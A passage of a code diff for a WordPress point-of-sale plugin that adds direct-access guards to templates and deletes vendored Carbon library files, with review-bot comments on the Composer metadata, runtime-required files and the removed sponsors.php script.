--- a/wpos-lite-version/templates/emails/op-customer-receipt.php
+++ b/wpos-lite-version/templates/emails/op-customer-receipt.php
@@ -1,3 +1,4 @@
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
 <!DOCTYPE html>
 <html>
 <head>
--- a/wpos-lite-version/templates/emails/plain/op-customer-receipt.php
+++ b/wpos-lite-version/templates/emails/plain/op-customer-receipt.php
@@ -1,3 +1,4 @@
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
 <!DOCTYPE html>
 <html>
 <head>
--- a/wpos-lite-version/templates/emails/receipt.php
+++ b/wpos-lite-version/templates/emails/receipt.php
@@ -1,7 +1,4 @@
-<?php
-   //$json = '{"id":1585542623171,"session":"op-1585377232-5c346840b58849bd06d9eb9a7b5fbaa5","order_number":518,"order_number_format":"#518","title":"","items":[{"id":1585542660560,"name":"ACME","barcode":"00000002272","sub_name":"","dining":"","price":16.53,"price_incl_tax":20,"product_id":2272,"final_price":16.53,"final_price_incl_tax":20,"final_price_source":"","options":[],"bundles":[],"variations":[],"rule_discount":{},"discount_source":"","discount_amount":0,"discount_type":"fixed","final_discount_amount":0,"final_discount_amount_incl_tax":0,"qty":1,"refund_qty":0,"exchange_qty":0,"refund_total":0,"tax_amount":0,"total_tax":3.47,"total":16.53,"total_incl_tax":20,"product":{"name":"ACME","id":2272,"parent_id":2272,"sku":"","qty":null,"manage_stock":false,"stock_status":"instock","barcode":"00000002272","image":"http://localhost.com/dev/openpos/wordpress/wp-content/uploads/2019/03/product-1552879577-436784698.png","price":16.53,"price_incl_tax":20,"final_price":16.53,"special_price":"","regular_price":20,"sale_from":null,"sale_to":null,"status":"publish","categories":[],"tax":[{"code":"standard_1","rate":21,"shipping":"yes","compound":"no","rate_id":1,"label":"Tax","total":3.47}],"tax_amount":3.47,"price_included_tax":1,"group_items":[],"variations":[],"options":[],"bundles":[],"display_special_price":false,"allow_change_price":true,"price_display_html":"<span class="woocommerce-Price-amount amount"><span 
class="woocommerce-Price-currencySymbol">$</span>20,00</span>","display":true,"str_key":"ACME"},"option_pass":true,"option_total":0,"bundle_total":0,"note":"","parent_id":0,"seller_id":0,"seller_name":"","item_type":"","has_custom_discount":false,"disable_qty_change":false,"read_only":false,"promotion_added":0,"tax_details":[{"code":"standard_1","compound":"no","label":"Tax","rate":21,"rate_id":1,"shipping":"yes","total":3.47}],"custom_fields":[],"is_exchange":false,"update_time":1585542660560}],"sub_total":16.53,"sub_total_incl_tax":20,"tax_amount":3.47,"customer":{"id":0,"group_id":0,"name":"","email":"","address":"","phone":"","point":0,"point_rate":0,"discount":0,"addition_data":{},"shipping_address":[]},"cart_rule_discount":{},"discount_source":"","discount_amount":0,"discount_final_amount":0,"discount_type":"","final_items_discount_amount":0,"final_discount_amount":0,"discount_tax_amount":0,"discount_excl_tax":0,"grand_total":20,"total_paid":0,"discount_code":"","discount_codes":[],"discount_code_amount":0,"discount_code_tax_amount":0,"discount_code_excl_tax":0,"payment_method":[{"name":"Cash","code":"cash","ref":"","description":"","paid":20,"return":0,"paid_point":0,"type":"offline","online_type":"","partial":false,"status_url":"","offline_transaction":"yes","offline_order":"yes"}],"shipping_information":{"shipping_method":"","shipping_title":"","address_id":0,"name":"","email":"","address":"","phone":"","note":"","shipping_method_details":{},"tax_details":[]},"shipping_cost":0,"shipping_tax":0,"shipping_tax_details":[],"sale_person":1,"sale_person_name":"admin","note":"","pickup_time":"","created_at":"3/30/2020, 11:31:11 
AM","state":"new","order_state":"","online_payment":false,"print_invoice":false,"point_discount":[],"add_discount":false,"add_shipping":false,"add_tax":false,"custom_tax_rate":0,"custom_tax_rates":[],"tax_details":[{"code":"standard_1","rate":21,"shipping":"yes","compound":"no","rate_id":1,"label":"Tax","total":3.47}],"discount_tax_details":[],"source":{},"source_type":"","available_shipping_methods":[],"mode":"incl_tax","is_takeaway":true,"sync_status":0,"addition_information":{},"email_receipt":"no","checkout_guide":"","privacy_accept":"yes","created_at_time":1585542671673,"order_id":518,"refunds":[],"exchanges":[],"refund_total":0}';
-    //$order_data = json_decode($json,true);
-?>
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
 <!DOCTYPE html>
 <html>
 <head>
--- a/wpos-lite-version/templates/front/session_customer_checkout.php
+++ b/wpos-lite-version/templates/front/session_customer_checkout.php
@@ -1 +1,3 @@
-sadfsa fasdfa dfsadf
 No newline at end of file
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 No newline at end of file
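Review bot: this template previously held only placeholder text ("sadfsa fasdfa dfsadf") and now holds only the ABSPATH guard. If nothing includes it, delete the file; if something does, it needs real markup. Shipping an empty guarded template hides a dead or unfinished code path.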
--- a/wpos-lite-version/templates/help.php
+++ b/wpos-lite-version/templates/help.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <html>
     <body>
         <h2><?php echo __('Hot Keys','wpos-lite');?></h2>
--- a/wpos-lite-version/templates/short_code_inventory.php
+++ b/wpos-lite-version/templates/short_code_inventory.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 global $op_warehouses;
 ?>
 <table class="warehouse-inventory-list">
--- a/wpos-lite-version/vendor/composer/installed.php
+++ b/wpos-lite-version/vendor/composer/installed.php
@@ -5,7 +5,7 @@
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
-        'reference' => '7fee99a5918e32fc188bac15f22f6cc0005d32b8',
+        'reference' => '774524facbdaa483560113749a13f41f23905a84',
         'name' => '__root__',
         'dev' => true,
     ),
@@ -16,7 +16,7 @@
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
-            'reference' => '7fee99a5918e32fc188bac15f22f6cc0005d32b8',
+            'reference' => '774524facbdaa483560113749a13f41f23905a84',
             'dev_requirement' => false,
         ),
         'carbonphp/carbon-doctrine-types' => array(
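Review bot: installed.php is generated by Composer; the root `reference` hash is updated here, but the Carbon files deleted in the following hunks are not reflected in Composer's autoload or lock data. Make bundle changes through `composer install`/`composer update` in the release build rather than editing vendor/ by hand, otherwise installed.php describes a tree that no longer exists.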
--- a/wpos-lite-version/vendor/nesbot/carbon/.phpstorm.meta.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/.phpstorm.meta.php
@@ -1,10 +0,0 @@
-<?php
-namespace PHPSTORM_META {
-    registerArgumentsSet("date_units", "millenania", "millennium", "century", "centuries", "decade", "decades", "year", "years", "y", "yr", "yrs", "quarter", "quarters", "month", "months", "mo", "mos", "week", "weeks", "w", "day", "days", "d", "hour", "hours", "h", "minute", "minutes", "m", "second", "seconds", "s", "millisecond", "milliseconds", "milli", "ms", "microsecond", "microseconds", "micro", "µs");
-    expectedArguments(CarbonTraitsUnits::add(), 0, argumentsSet("date_units"));
-    expectedArguments(CarbonTraitsUnits::add(), 1, argumentsSet("date_units"));
-    expectedArguments(CarbonCarbonInterface::add(), 0, argumentsSet("date_units"));
-    expectedArguments(CarbonCarbonInterface::add(), 1, argumentsSet("date_units"));
-
-    expectedArguments(CarbonCarbonInterface::getTimeFormatByPrecision(), 0, "minute", "second", "m", "millisecond", "µ", "microsecond", "minutes", "seconds", "ms", "milliseconds", "µs", "microseconds");
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/MessageFormatter/MessageFormatterMapperStrongType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/MessageFormatter/MessageFormatterMapperStrongType.php
@@ -1,28 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonMessageFormatter;
-
-use SymfonyComponentTranslationFormatterMessageFormatterInterface;
-
-if (!class_exists(LazyMessageFormatter::class, false)) {
-    abstract class LazyMessageFormatter implements MessageFormatterInterface
-    {
-        public function format(string $message, string $locale, array $parameters = []): string
-        {
-            return $this->formatter->format(
-                $message,
-                $this->transformLocale($locale),
-                $parameters
-            );
-        }
-    }
-}
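Review bot: the `if (!class_exists(LazyMessageFormatter::class, false))` wrapper visible in this file is the pattern Carbon uses for files it require()s at runtime, choosing the StrongType or WeakType variant by the installed Symfony version; these are not dev-only helpers like the .phpstorm.meta.php removed above. Deleting them from vendor/ by hand produces a fatal error the first time that code path runs. The same applies to the PHPStan AbstractMacro variants deleted below.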
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/MessageFormatter/MessageFormatterMapperWeakType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/MessageFormatter/MessageFormatterMapperWeakType.php
@@ -1,36 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonMessageFormatter;
-
-use SymfonyComponentTranslationFormatterChoiceMessageFormatterInterface;
-use SymfonyComponentTranslationFormatterMessageFormatterInterface;
-
-if (!class_exists(LazyMessageFormatter::class, false)) {
-    abstract class LazyMessageFormatter implements MessageFormatterInterface, ChoiceMessageFormatterInterface
-    {
-        abstract protected function transformLocale(?string $locale): ?string;
-
-        public function format($message, $locale, array $parameters = [])
-        {
-            return $this->formatter->format(
-                $message,
-                $this->transformLocale($locale),
-                $parameters
-            );
-        }
-
-        public function choiceFormat($message, $number, $locale, array $parameters = [])
-        {
-            return $this->formatter->choiceFormat($message, $number, $locale, $parameters);
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/AbstractMacroBuiltin.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/AbstractMacroBuiltin.php
@@ -1,36 +0,0 @@
-<?php
-
-declare(strict_types=1);
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonPHPStan;
-
-use PHPStanBetterReflectionReflection;
-use ReflectionMethod;
-
-if (!class_exists(AbstractReflectionMacro::class, false)) {
-    abstract class AbstractReflectionMacro extends AbstractMacro
-    {
-        /**
-         * {@inheritdoc}
-         */
-        public function getReflection(): ?ReflectionMethod
-        {
-            if ($this->reflectionFunction instanceof ReflectionReflectionMethod) {
-                return new ReflectionAdapterReflectionMethod($this->reflectionFunction);
-            }
-
-            return $this->reflectionFunction instanceof ReflectionMethod
-                ? $this->reflectionFunction
-                : null;
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/AbstractMacroStatic.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/AbstractMacroStatic.php
@@ -1,45 +0,0 @@
-<?php
-
-declare(strict_types=1);
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonPHPStan;
-
-use PHPStanBetterReflectionReflection;
-use ReflectionMethod;
-
-if (!class_exists(AbstractReflectionMacro::class, false)) {
-    abstract class AbstractReflectionMacro extends AbstractMacro
-    {
-        /**
-         * {@inheritdoc}
-         */
-        public function getReflection(): ?ReflectionAdapterReflectionMethod
-        {
-            if ($this->reflectionFunction instanceof ReflectionAdapterReflectionMethod) {
-                return $this->reflectionFunction;
-            }
-
-            if ($this->reflectionFunction instanceof ReflectionReflectionMethod) {
-                return new ReflectionAdapterReflectionMethod($this->reflectionFunction);
-            }
-
-            return $this->reflectionFunction instanceof ReflectionMethod
-                ? new ReflectionAdapterReflectionMethod(
-                    ReflectionReflectionMethod::createFromName(
-                        $this->reflectionFunction->getDeclaringClass()->getName(),
-                        $this->reflectionFunction->getName()
-                    )
-                )
-                : null;
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/MacroStrongType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/MacroStrongType.php
@@ -1,45 +0,0 @@
-<?php
-
-declare(strict_types=1);
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonPHPStan;
-
-if (!class_exists(LazyMacro::class, false)) {
-    abstract class LazyMacro extends AbstractReflectionMacro
-    {
-        /**
-         * {@inheritdoc}
-         */
-        public function getFileName(): ?string
-        {
-            $file = $this->reflectionFunction->getFileName();
-
-            return (($file ? realpath($file) : null) ?: $file) ?: null;
-        }
-
-        /**
-         * {@inheritdoc}
-         */
-        public function getStartLine(): ?int
-        {
-            return $this->reflectionFunction->getStartLine();
-        }
-
-        /**
-         * {@inheritdoc}
-         */
-        public function getEndLine(): ?int
-        {
-            return $this->reflectionFunction->getEndLine();
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/MacroWeakType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/MacroWeakType.php
@@ -1,51 +0,0 @@
-<?php
-
-declare(strict_types=1);
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonPHPStan;
-
-if (!class_exists(LazyMacro::class, false)) {
-    abstract class LazyMacro extends AbstractReflectionMacro
-    {
-        /**
-         * {@inheritdoc}
-         *
-         * @return string|false
-         */
-        public function getFileName()
-        {
-            $file = $this->reflectionFunction->getFileName();
-
-            return (($file ? realpath($file) : null) ?: $file) ?: null;
-        }
-
-        /**
-         * {@inheritdoc}
-         *
-         * @return int|false
-         */
-        public function getStartLine()
-        {
-            return $this->reflectionFunction->getStartLine();
-        }
-
-        /**
-         * {@inheritdoc}
-         *
-         * @return int|false
-         */
-        public function getEndLine()
-        {
-            return $this->reflectionFunction->getEndLine();
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/TranslatorStrongType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/TranslatorStrongType.php
@@ -1,52 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Carbon;
-
-use SymfonyComponentTranslationMessageCatalogueInterface;
-
-if (!class_exists(LazyTranslator::class, false)) {
-    class LazyTranslator extends AbstractTranslator implements TranslatorStrongTypeInterface
-    {
-        public function trans(?string $id, array $parameters = [], ?string $domain = null, ?string $locale = null): string
-        {
-            return $this->translate($id, $parameters, $domain, $locale);
-        }
-
-        public function getFromCatalogue(MessageCatalogueInterface $catalogue, string $id, string $domain = 'messages')
-        {
-            $messages = $this->getPrivateProperty($catalogue, 'messages');
-
-            if (isset($messages[$domain.MessageCatalogueInterface::INTL_DOMAIN_SUFFIX][$id])) {
-                return $messages[$domain.MessageCatalogueInterface::INTL_DOMAIN_SUFFIX][$id];
-            }
-
-            if (isset($messages[$domain][$id])) {
-                return $messages[$domain][$id];
-            }
-
-            $fallbackCatalogue = $this->getPrivateProperty($catalogue, 'fallbackCatalogue');
-
-            if ($fallbackCatalogue !== null) {
-                return $this->getFromCatalogue($fallbackCatalogue, $id, $domain);
-            }
-
-            return $id;
-        }
-
-        private function getPrivateProperty($instance, string $field)
-        {
-            return (function (string $field) {
-                return $this->$field;
-            })->call($instance, $field);
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/TranslatorWeakType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/TranslatorWeakType.php
@@ -1,32 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Carbon;
-
-if (!class_exists(LazyTranslator::class, false)) {
-    class LazyTranslator extends AbstractTranslator
-    {
-        /**
-         * Returns the translation.
-         *
-         * @param string|null $id
-         * @param array       $parameters
-         * @param string|null $domain
-         * @param string|null $locale
-         *
-         * @return string
-         */
-        public function trans($id, array $parameters = [], $domain = null, $locale = null)
-        {
-            return $this->translate($id, $parameters, $domain, $locale);
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/sponsors.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/sponsors.php
@@ -1,129 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-use CarbonCarbonImmutable;
-
-require_once __DIR__.'/vendor/autoload.php';
-
-function getMaxHistoryMonthsByAmount($amount): int
-{
-    if ($amount >= 50) {
-        return 6;
-    }
-
-    if ($amount >= 20) {
-        return 4;
-    }
-
-    return 2;
-}
-
-function getHtmlAttribute($rawValue): string
-{
-    return str_replace(
-        ['​', "r"],
-        '',
-        trim(htmlspecialchars((string) $rawValue), "  nrtv"),
-    );
-}
-
-function getOpenCollectiveSponsors(): string
-{
-    $customSponsorImages = [
-        // For consistency and equity among sponsors, as of now, we kindly ask our sponsors
-        // to provide an image having a width/height ratio between 1/1 and 2/1.
-        // By default, we'll show the member picture from OpenCollective, and will resize it if bigger
-        // int(OpenCollective.MemberId) => ImageURL
-    ];
-
-    $members = json_decode(file_get_contents('https://opencollective.com/carbon/members/all.json'), true);
-
-    $list = array_filter($members, static function ($member): bool {
-        return ($member['lastTransactionAmount'] > 3 || $member['isActive']) &&
-            $member['role'] === 'BACKER' &&
-            $member['type'] !== 'USER' &&
-            (
-                $member['totalAmountDonated'] > 100 ||
-                $member['lastTransactionAt'] > CarbonImmutable::now()
-                    ->subMonthsNoOverflow(getMaxHistoryMonthsByAmount($member['lastTransactionAmount']))
-                    ->format('Y-m-d h:i') ||
-                $member['isActive'] && $member['lastTransactionAmount'] >= 30
-            );
-    });
-
-    $list = array_map(static function (array $member): array {
-        $createdAt = CarbonImmutable::parse($member['createdAt']);
-        $lastTransactionAt = CarbonImmutable::parse($member['lastTransactionAt']);
-
-        if ($createdAt->format('d H:i:s.u') > $lastTransactionAt->format('d H:i:s.u')) {
-            $createdAt = $createdAt
-                ->setDay($lastTransactionAt->day)
-                ->modify($lastTransactionAt->format('H:i:s.u'));
-        }
-
-        $monthlyContribution = (float) ($member['totalAmountDonated'] / ceil($createdAt->floatDiffInMonths()));
-
-        if (
-            $lastTransactionAt->isAfter('last month') &&
-            $member['lastTransactionAmount'] > $monthlyContribution
-        ) {
-            $monthlyContribution = (float) $member['lastTransactionAmount'];
-        }
-
-        $yearlyContribution = (float) ($member['totalAmountDonated'] / max(1, $createdAt->floatDiffInYears()));
-        $status = null;
-
-        if ($monthlyContribution > 29) {
-            $status = 'sponsor';
-        } elseif ($monthlyContribution > 4.5 || $yearlyContribution > 29) {
-            $status = 'backer';
-        } elseif ($member['totalAmountDonated'] > 0) {
-            $status = 'helper';
-        }
-
-        return array_merge($member, [
-            'star' => ($monthlyContribution > 98 || $yearlyContribution > 500),
-            'status' => $status,
-            'monthlyContribution' => $monthlyContribution,
-            'yearlyContribution' => $yearlyContribution,
-        ]);
-    }, $list);
-
-    usort($list, static function (array $a, array $b): int {
-        return ($b['monthlyContribution'] <=> $a['monthlyContribution'])
-            ?: ($b['totalAmountDonated'] <=> $a['totalAmountDonated']);
-    });
-
-    return implode('', array_map(static function (array $member) use ($customSponsorImages): string {
-        $href = htmlspecialchars($member['website'] ?? $member['profile']);
-        $src = $customSponsorImages[$member['MemberId'] ?? ''] ?? $member['image'] ?? (strtr($member['profile'], ['https://opencollective.com/' => 'https://images.opencollective.com/']).'/avatar/256.png');
-        [$x, $y] = @getimagesize($src) ?: [0, 0];
-        $validImage = ($x && $y);
-        $src = $validImage ? htmlspecialchars($src) : 'https://opencollective.com/static/images/default-guest-logo.svg';
-        $height = $member['status'] === 'sponsor' ? 64 : 42;
-        $width = min($height * 2, $validImage ? round($x * $height / $y) : $height);
-        $href .= (strpos($href, '?') === false ? '?' : '&').'utm_source=opencollective&utm_medium=github&utm_campaign=Carbon';
-        $title = getHtmlAttribute(($member['description'] ?? null) ?: $member['name']);
-        $alt = getHtmlAttribute($member['name']);
-
-        return "n".'<a title="'.$title.'" href="'.$href.'" target="_blank">'.
-            '<img alt="'.$alt.'" src="'.$src.'" width="'.$width.'" height="'.$height.'">'.
-            '</a>';
-    }, $list))."n";
-}
-
-file_put_contents('readme.md', preg_replace_callback(
-    '/(<!-- <open-collective-sponsors> -->)[sS]+(<!-- </open-collective-sponsors> -->)/',
-    static function (array $match): string {
-        return $match[1].getOpenCollectiveSponsors().$match[2];
-    },
-    file_get_contents('readme.md')
-));
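Review bot: removing `sponsors.php` is the right call and the most security-relevant deletion in this batch, because it is a maintainer-side script rather than library code and is directly requestable when shipped under a plugin directory: it does `require_once __DIR__.'/vendor/autoload.php'`, fetches `https://opencollective.com/carbon/members/all.json` with `file_get_contents`, calls `@getimagesize($src)` on third-party-supplied image URLs from that JSON, and finally rewrites `readme.md` relative to the current working directory via `file_put_contents`. A deployable plugin should never carry it; if Carbon is kept in any future build, add a packaging step that excludes everything outside `src/` from vendored dependencies so the file is not reintroduced by the next `composer install`.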
--- a/wpos-lite-version/vendor/nesbot/carbon/src/Carbon/AbstractTranslator.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/src/Carbon/AbstractTranslator.php
@@ -1,400 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Carbon;
-
-use CarbonMessageFormatterMessageFormatterMapper;
-use Closure;
-use ReflectionException;
-use ReflectionFunction;
-use SymfonyComponentTranslation;
-use SymfonyComponentTranslationFormatterMessageFormatterInterface;
-use SymfonyComponentTranslationLoaderArrayLoader;
-
-abstract class AbstractTranslator extends TranslationTranslator
-{
-    /**
-     * Translator singletons for each language.
-     *
-     * @var array
-     */
-    protected static $singletons = [];
-
-    /**
-     * List of custom localized messages.
-     *
-     * @var array
-     */
-    protected $messages = [];
-
-    /**
-     * List of custom directories that contain translation files.
-     *
-     * @var string[]
-     */
-    protected $directories = [];
-
-    /**
-     * Set to true while constructing.
-     *
-     * @var bool
-     */
-    protected $initializing = false;
-
-    /**
-     * List of locales aliases.
-     *
-     * @var array<string, string>
-     */
-    protected $aliases = [
-        'me' => 'sr_Latn_ME',
-        'scr' => 'sh',
-    ];
-
-    /**
-     * Return a singleton instance of Translator.
-     *
-     * @param string|null $locale optional initial locale ("en" - english by default)
-     *
-     * @return static
-     */
-    public static function get($locale = null)
-    {
-        $locale = $locale ?: 'en';
-        $key = static::class === Translator::class ? $locale : static::class.'|'.$locale;
-
-        if (!isset(static::$singletons[$key])) {
-            static::$singletons[$key] = new static($locale);
-        }
-
-        return static::$singletons[$key];
-    }
-
-    public function __construct($locale, ?MessageFormatterInterface $formatter = null, $cacheDir = null, $debug = false)
-    {
-        parent::setLocale($locale);
-        $this->initializing = true;
-        $this->directories = [__DIR__.'/Lang'];
-        $this->addLoader('array', new ArrayLoader());
-        parent::__construct($locale, new MessageFormatterMapper($formatter), $cacheDir, $debug);
-        $this->initializing = false;
-    }
-
-    /**
-     * Returns the list of directories translation files are searched in.
-     *
-     * @return array
-     */
-    public function getDirectories(): array
-    {
-        return $this->directories;
-    }
-
-    /**
-     * Set list of directories translation files are searched in.
-     *
-     * @param array $directories new directories list
-     *
-     * @return $this
-     */
-    public function setDirectories(array $directories)
-    {
-        $this->directories = $directories;
-
-        return $this;
-    }
-
-    /**
-     * Add a directory to the list translation files are searched in.
-     *
-     * @param string $directory new directory
-     *
-     * @return $this
-     */
-    public function addDirectory(string $directory)
-    {
-        $this->directories[] = $directory;
-
-        return $this;
-    }
-
-    /**
-     * Remove a directory from the list translation files are searched in.
-     *
-     * @param string $directory directory path
-     *
-     * @return $this
-     */
-    public function removeDirectory(string $directory)
-    {
-        $search = rtrim(strtr($directory, '\', '/'), '/');
-
-        return $this->setDirectories(array_filter($this->getDirectories(), function ($item) use ($search) {
-            return rtrim(strtr($item, '\', '/'), '/') !== $search;
-        }));
-    }
-
-    /**
-     * Reset messages of a locale (all locale if no locale passed).
-     * Remove custom messages and reload initial messages from matching
-     * file in Lang directory.
-     *
-     * @param string|null $locale
-     *
-     * @return bool
-     */
-    public function resetMessages($locale = null)
-    {
-        if ($locale === null) {
-            $this->messages = [];
-
-            return true;
-        }
-
-        $this->assertValidLocale($locale);
-
-        foreach ($this->getDirectories() as $directory) {
-            $data = @include sprintf('%s/%s.php', rtrim($directory, '\/'), $locale);
-
-            if ($data !== false) {
-                $this->messages[$locale] = $data;
-                $this->addResource('array', $this->messages[$locale], $locale);
-
-                return true;
-            }
-        }
-
-        return false;
-    }
-
-    /**
-     * Returns the list of files matching a given locale prefix (or all if empty).
-     *
-     * @param string $prefix prefix required to filter result
-     *
-     * @return array
-     */
-    public function getLocalesFiles($prefix = '')
-    {
-        $files = [];
-
-        foreach ($this->getDirectories() as $directory) {
-            $directory = rtrim($directory, '\/');
-
-            foreach (glob("$directory/$prefix*.php") as $file) {
-                $files[] = $file;
-            }
-        }
-
-        return array_unique($files);
-    }
-
-    /**
-     * Returns the list of internally available locales and already loaded custom locales.
-     * (It will ignore custom translator dynamic loading.)
-     *
-     * @param string $prefix prefix required to filter result
-     *
-     * @return array
-     */
-    public function getAvailableLocales($prefix = '')
-    {
-        $locales = [];
-        foreach ($this->getLocalesFiles($prefix) as $file) {
-            $locales[] = substr($file, strrpos($file, '/') + 1, -4);
-        }
-
-        return array_unique(array_merge($locales, array_keys($this->messages)));
-    }
-
-    protected function translate(?string $id, array $parameters = [], ?string $domain = null, ?string $locale = null): string
-    {
-        if ($domain === null) {
-            $domain = 'messages';
-        }
-
-        $catalogue = $this->getCatalogue($locale);
-        $format = $this instanceof TranslatorStrongTypeInterface
-            ? $this->getFromCatalogue($catalogue, (string) $id, $domain)
-            : $this->getCatalogue($locale)->get((string) $id, $domain); // @codeCoverageIgnore
-
-        if ($format instanceof Closure) {
-            // @codeCoverageIgnoreStart
-            try {
-                $count = (new ReflectionFunction($format))->getNumberOfRequiredParameters();
-            } catch (ReflectionException $exception) {
-                $count = 0;
-            }
-            // @codeCoverageIgnoreEnd
-
-            return $format(
-                ...array_values($parameters),
-                ...array_fill(0, max(0, $count - count($parameters)), null)
-            );
-        }
-
-        return parent::trans($id, $parameters, $domain, $locale);
-    }
-
-    /**
-     * Init messages language from matching file in Lang directory.
-     *
-     * @param string $locale
-     *
-     * @return bool
-     */
-    protected function loadMessagesFromFile($locale)
-    {
-        return isset($this->messages[$locale]) || $this->resetMessages($locale);
-    }
-
-    /**
-     * Set messages of a locale and take file first if present.
-     *
-     * @param string $locale
-     * @param array  $messages
-     *
-     * @return $this
-     */
-    public function setMessages($locale, $messages)
-    {
-        $this->loadMessagesFromFile($locale);
-        $this->addResource('array', $messages, $locale);
-        $this->messages[$locale] = array_merge(
-            $this->messages[$locale] ?? [],
-            $messages
-        );
-
-        return $this;
-    }
-
-    /**
-     * Set messages of the current locale and take file first if present.
-     *
-     * @param array $messages
-     *
-     * @return $this
-     */
-    public function setTranslations($messages)
-    {
-        return $this->setMessages($this->getLocale(), $messages);
-    }
-
-    /**
-     * Get messages of a locale, if none given, return all the
-     * languages.
-     *
-     * @param string|null $locale
-     *
-     * @return array
-     */
-    public function getMessages($locale = null)
-    {
-        return $locale === null ? $this->messages : $this->messages[$locale];
-    }
-
-    /**
-     * Set the current translator locale and indicate if the source locale file exists
-     *
-     * @param string $locale locale ex. en
-     *
-     * @return bool
-     */
-    public function setLocale($locale)
-    {
-        $locale = preg_replace_callback('/[-_]([a-z]{2,}|d{2,})/', function ($matches) {
-            // _2-letters or YUE is a region, _3+-letters is a variant
-            $upper = strtoupper($matches[1]);
-
-            if ($upper === 'YUE' || $upper === 'ISO' || strlen($upper) < 3) {
-                return "_$upper";
-            }
-
-            return '_'.ucfirst($matches[1]);
-        }, strtolower($locale));
-
-        $previousLocale = $this->getLocale();
-
-        if ($previousLocale === $locale && isset($this->messages[$locale])) {
-            return true;
-        }
-
-        unset(static::$singletons[$previousLocale]);
-
-        if ($locale === 'auto') {
-            $completeLocale = setlocale(LC_TIME, '0');
-            $locale = preg_replace('/^([^_.-]+).*$/', '$1', $completeLocale);
-            $locales = $this->getAvailableLocales($locale);
-
-            $completeLocaleChunks = preg_split('/[_.-]+/', $completeLocale);
-
-            $getScore = function ($language) use ($completeLocaleChunks) {
-                return self::compareChunkLists($completeLocaleChunks, preg_split('/[_.-]+/', $language));
-            };
-
-            usort($locales, function ($first, $second) use ($getScore) {
-                return $getScore($second) <=> $getScore($first);
-            });
-
-            $locale = $locales[0];
-        }
-
-        if (isset($this->aliases[$locale])) {
-            $locale = $this->aliases[$locale];
-        }
-
-        // If subtag (ex: en_CA) first load the macro (ex: en) to have a fallback
-        if (str_contains($locale, '_') &&
-            $this->loadMessagesFromFile($macroLocale = preg_replace('/^([^_]+).*$/', '$1', $locale))
-        ) {
-            parent::setLocale($macroLocale);
-        }
-
-        if (!$this->loadMessagesFromFile($locale) && !$this->initializing) {
-            return false;
-        }
-
-        parent::setLocale($locale);
-
-        return true;
-    }
-
-    /**
-     * Show locale on var_dump().
